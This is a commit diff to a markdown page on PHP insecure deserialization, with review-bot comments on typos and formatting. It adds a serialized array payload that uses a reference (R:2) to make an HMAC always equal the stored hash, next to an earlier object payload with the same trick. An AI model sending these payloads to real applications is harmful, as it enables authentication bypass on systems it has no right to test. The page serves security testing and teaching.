Update PHP.md

Muhammad Fikri Ashari 2020-09-25 09:43:35 +07:00 committed by GitHub
parent 0a01854a6a
commit 992732877f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

@ -111,6 +111,12 @@ Payload:
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
``` ```
We can do an array to like this:
```php
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
```
## Finding and using gadgets ## Finding and using gadgets
Also called "PHP POP Chains", they can be used to gain RCE on the system. Also called "PHP POP Chains", they can be used to gain RCE on the system.
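Review bot: The added sentence "We can do an array to like this:" has a typo ("to" should be "too") and does not explain why the array form works. Suggest adding one line saying that `R:2` makes the `hmac` element a reference to the `admin_hash` value, so the two always compare equal, which is the same trick as the `Object` payload directly above. The key names also change from `secretCode`/`guess` to `admin_hash`/`hmac` with no explanation, so either reuse the earlier names or say what scenario the new ones come from. Finally, the new fence is tagged `php` although its content is a serialized string rather than PHP source; an untagged or `text` fence would be more accurate.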
@ -193,4 +199,4 @@ $poc->stopBuffering();
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web) * [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41) * [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/) * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/) * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
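Review bot: No textual difference is visible between the old and new sides of this references hunk (`-193,4 +199,4`), so the change here looks like whitespace or an end-of-file newline only. If that is intentional, mention it in the commit message, which currently says only "Update PHP.md"; otherwise drop it from this commit. Since the line is already touched, "challeneg" in the Jack The Ripper entry could be fixed to "challenge" in the same pass.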